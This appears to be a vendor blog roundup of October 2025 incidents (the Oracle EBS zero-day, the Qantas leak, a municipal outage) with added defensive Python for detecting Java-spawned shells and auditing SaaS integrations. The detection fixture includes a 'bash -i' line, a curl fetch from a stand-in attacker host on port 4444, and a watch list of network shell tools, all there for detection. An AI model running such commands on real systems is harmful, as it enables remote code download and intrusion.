Weekend Cybersecurity Roundup: Oracle Exploits, Qantas Leak & More

By Krista Lyons
Even as October settles in, the cyberthreat landscape is already heating up. Here's what you might have missed from Oct. 10-13, 2025.
This past weekend delivered a trio of high-impact incidents that underscore just how wide and deep the risk is — from critical enterprise software to public services and consumer travel.
Oracle EBS Zero-Day & the Cl0p Extortion Wave
On October 10, security researchers disclosed that threat actors tied to the Cl0p ransomware operation had exploited a zero-day vulnerability (CVE-2025-61882) in Oracle’s E-Business Suite (EBS), triggering a data extortion campaign against dozens of organizations dating back to August.
The attack chain reportedly chained together multiple flaws — SSRF, CRLF injection, authentication bypass — to gain remote code execution on EBS servers and steal sensitive corporate data. Oracle responded by issuing emergency patches, but analysts warn that many organizations remain unpatched and exposed.
This episode is a stark reminder that enterprise software, especially legacy or heavily customized suites like Oracle EBS, remains a prime target. Adversaries are increasingly turning to creative, multi-stage exploit chains instead of relying solely on phishing or social engineering.
Read more about the vulnerability and patch here.
Takeaway — for IT & security leaders:
- Prioritize patching of Oracle EBS systems, especially internet-facing instances.
- Monitor for indicators of compromise tied to the exploit (e.g. unusual “applmgr” activity, reverse shells via Java payloads).
- Segment and limit access to critical back-end modules (don’t let a compromise cascade across your internal systems).
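The second takeaway, monitoring for unusual applmgr activity and shells spawned from Java, can be turned into a simple host-level detection. The following is an added example, not code from the original post or from Oracle: it scans constructed process-execution events (a hypothetical pipe-delimited format, with a hypothetical baseline of known-good script paths and a TEST-NET-2 address) and flags cases where a Java process running as the watched user spawns an interactive shell or a network client.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample process-execution events in a hypothetical format:
# timestamp | user | parent process | process | command line.
# This is not real Oracle EBS telemetry; the class name and paths are placeholders
# and 198.51.100.23 is from the TEST-NET-2 documentation range.
SAMPLE_LOG = """\
2025-10-11T02:14:03Z | applmgr | java | java | /u01/oracle/jdk/bin/java -Xmx2g com.example.ebs.ConcurrentManager
2025-10-11T02:14:07Z | applmgr | java | sh | /bin/sh -c /u01/oracle/apps/scripts/known_wrapper.sh
2025-10-11T02:15:22Z | applmgr | java | bash | /bin/bash -i
2025-10-11T02:15:40Z | oracle | sqlplus | sh | /bin/sh -c cat /tmp/report.sql
2025-10-11T03:01:11Z | applmgr | cron | sh | /bin/sh /u01/scripts/nightly_backup.sh
2025-10-11T03:02:00Z | applmgr | java | curl | curl -s http://198.51.100.23:4444/x
"""

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
NET_TOOLS = {"curl", "wget", "nc", "ncat", "socat"}

# Hypothetical baseline: shell invocations the concurrent managers are known to make.
# In practice this list is built from observed, reviewed activity on the specific host,
# because EBS does legitimately run host programs from Java.
KNOWN_GOOD_PREFIXES = ("/bin/sh -c /u01/oracle/apps/scripts/",)


@dataclass
class Alert:
    ts: str
    rule: str
    argv: str


def parse_event(line: str) -> Optional[Tuple[str, str, str, str, str]]:
    """Split one log line into its five fields; return None for malformed lines."""
    parts = [p.strip() for p in line.split("|", 4)]
    if len(parts) != 5 or not all(parts):
        return None
    return parts[0], parts[1], parts[2], parts[3], parts[4]


def detect(log_text: str, watched_user: str = "applmgr") -> List[Alert]:
    """Flag shells and network clients spawned by Java under the watched account."""
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        ts, user, parent, comm, argv = ev
        # Only Java children of the application account are of interest here.
        if user != watched_user or parent != "java":
            continue
        if comm in SHELLS and not argv.startswith(KNOWN_GOOD_PREFIXES):
            alerts.append(Alert(ts, "java_spawned_shell", argv))
        elif comm in NET_TOOLS:
            alerts.append(Alert(ts, "java_spawned_network_tool", argv))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a.ts} {a.rule}: {a.argv}")
```

Run against the constructed log, the allowlisted wrapper script and the cron-launched backup are ignored, while the interactive bash and the curl spawned from Java are reported. The baseline is the important tuning knob: without it, the rule will fire on routine concurrent-manager activity.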
Not sure if your network security would hold up against this attack? Download the IT Admins' Guide to find out.
Qantas Data Leak & the Fallout from Salesforce Intrusions
In another bombshell, over 5 million Qantas customers may have had their personal data published on the dark web, following a breach tied to a broader attack on Salesforce systems that we shared with you last week.
The hacker group Scattered Lapsus$ Hunters (an “umbrella” of sorts combining Scattered Spider, LAPSUS$, ShinyHunters) claims responsibility, listing 39 companies whose Salesforce databases were targeted via social engineering. The stolen fields include names, email addresses, dates of birth, phone numbers, and in some cases home addresses. Importantly, Qantas insists that passwords, financial data, and identity docs were not part of the leak.
The deadline for ransom negotiations expired October 11, and the hackers appear to have followed through by posting the data. The move has reignited scrutiny around SaaS integrity, third-party risk, and the limits of “not our vulnerability” defenses.
Takeaway — for organizations relying on SaaS:
- Treat access to SaaS platforms as high trust zones. Employ Zero Trust principles even for cloud services.
- Layer multi-factor authentication, conditional access, and adaptive controls for SaaS App Protection (which you can do with OpenVPN).
- Continuously audit and review permissions, especially integrations and API access.
- Monitor threat actor chatter and dark web leaks for mention of your org in SaaS compromise lists.
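The permissions-review point above is easiest to keep up with when it is scripted. This is an added example, not code from the original post or from any SaaS vendor: it reads a constructed export of connected apps and integration credentials in a hypothetical schema (real platforms expose this through their own admin APIs) and flags integrations with broad scopes, stale credentials, deactivated owners, or no IP restriction.

```python
import json
from datetime import date
from typing import Dict, List

# Constructed export of integrations in a hypothetical schema. Field names and
# scope names are placeholders, not those of any particular SaaS platform.
SAMPLE_EXPORT = json.dumps([
    {"name": "crm-sync", "scopes": ["api", "refresh_token"],
     "last_used": "2025-10-09", "owner_active": True, "ip_restricted": True},
    {"name": "legacy-reporting", "scopes": ["full"],
     "last_used": "2025-03-02", "owner_active": False, "ip_restricted": False},
    {"name": "helpdesk-connector", "scopes": ["api", "full"],
     "last_used": "2025-10-12", "owner_active": True, "ip_restricted": False},
    {"name": "marketing-export", "scopes": ["api"],
     "last_used": "2025-06-15", "owner_active": True, "ip_restricted": True},
])

# Hypothetical scope names that grant unrestricted access in this schema.
BROAD_SCOPES = {"full", "*", "admin"}
# Credentials unused for longer than this are candidates for revocation.
STALE_DAYS = 90


def audit(export_json: str, as_of: str) -> Dict[str, List[str]]:
    """Return {integration name: [issue, ...]} for every integration with findings.

    as_of is an ISO date (YYYY-MM-DD) used to measure credential staleness.
    """
    today = date.fromisoformat(as_of)
    findings: Dict[str, List[str]] = {}
    for app in json.loads(export_json):
        issues: List[str] = []
        if BROAD_SCOPES & set(app["scopes"]):
            issues.append("broad_scope")
        last_used = date.fromisoformat(app["last_used"])
        if (today - last_used).days > STALE_DAYS:
            issues.append("stale_credential")
        if not app["owner_active"]:
            issues.append("orphaned_owner")
        if not app["ip_restricted"]:
            issues.append("no_ip_restriction")
        if issues:
            findings[app["name"]] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_EXPORT, "2025-10-13").items():
        print(f"{name}: {', '.join(issues)}")
```

On the constructed data, only crm-sync passes cleanly; legacy-reporting trips every check and is the kind of forgotten integration that a social-engineering-driven compromise turns into a data export path. Running this on a schedule and diffing the output against the previous run makes the "continuously" part concrete.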
Local Impact: City of Sugar Land hit by Cyber Disruption
On the municipal front, Sugar Land, Texas experienced a “cyber event” that disrupted its network infrastructure, phone systems, internet, and online payment services. While essential systems (emergency services, utilities) remained operational (thank goodness!), the breach forced the city to suspend late fees and pause utility disconnections.
Recovery is ongoing, investigations are active, and the city has publicly committed to restoring its systems and determining the root cause.
Read more in the Houston Chronicle.
This reminds us: even “lower profile” entities like municipalities or utilities are in the crosshairs. Their critical service role makes them high-value targets — and disruption there can cascade quickly into public safety or trust crises.
Takeaway — for local gov & public sector leaders:
- Conduct a rapid risk assessment of critical systems (payments, citizen portals, infrastructure control).
- Maintain robust backup and recovery posture (offline backups, tested restore plans).
- Engage with state/federal cyber incident response resources early (FEMA, CISA, etc.).
- Communicate transparently with residents and stakeholders to manage expectations.
Find out how to prevent attacks by implementing Zero Trust Network Access with a complimentary Gartner report.
Looking ahead — how OpenVPN can help
In the wake of these events, VPNs and secure connectivity tools are more crucial than ever. Here’s where OpenVPN’s story can bolster resilience:
- Zero Trust Network Access: Deploying VPNs as part of a Zero Trust architecture helps ensure that even if a user’s credentials are compromised, lateral movement is constrained. Access should be explicitly granted and continuously validated.
- Secure Remote Access: As more systems (ERP, SaaS, internal apps) are exposed or cloud-connected, ensuring encrypted, authenticated tunnels to critical services is foundational. OpenVPN can act as a protective layer for those access paths.
- Defense in Depth: A VPN by itself doesn’t stop exploits — but combined with patching, segmentation, identity controls, and monitoring, it’s an important boundary in a multi-layer defense stack.
- Visibility and Control: OpenVPN allows logging and policy control, giving security teams insight into who’s connecting, from where, and to what — which is essential when investigating incidents like the Oracle or Salesforce breaches.
Final Thoughts
This past weekend’s headlines serve as a potent reminder: no platform or sector is immune. From global SaaS giants to municipal services and enterprise backbones, attackers are targeting the seams between trust zones.
For security leaders, the imperative is clear:
- Immediately assess exposure to high-risk systems (Oracle, ERP, cloud services).
- Patch, monitor, segment, and limit trust.
- Reexamine your remote access and network boundary strategies — could VPN, zero trust, or micro-segmentation add meaningful protection?
Ready to see how OpenVPN can help protect your organization from attacks?
Try self-hosted Access Server or managed CloudConnexa for free - no credit card required.
See Which One is Right for You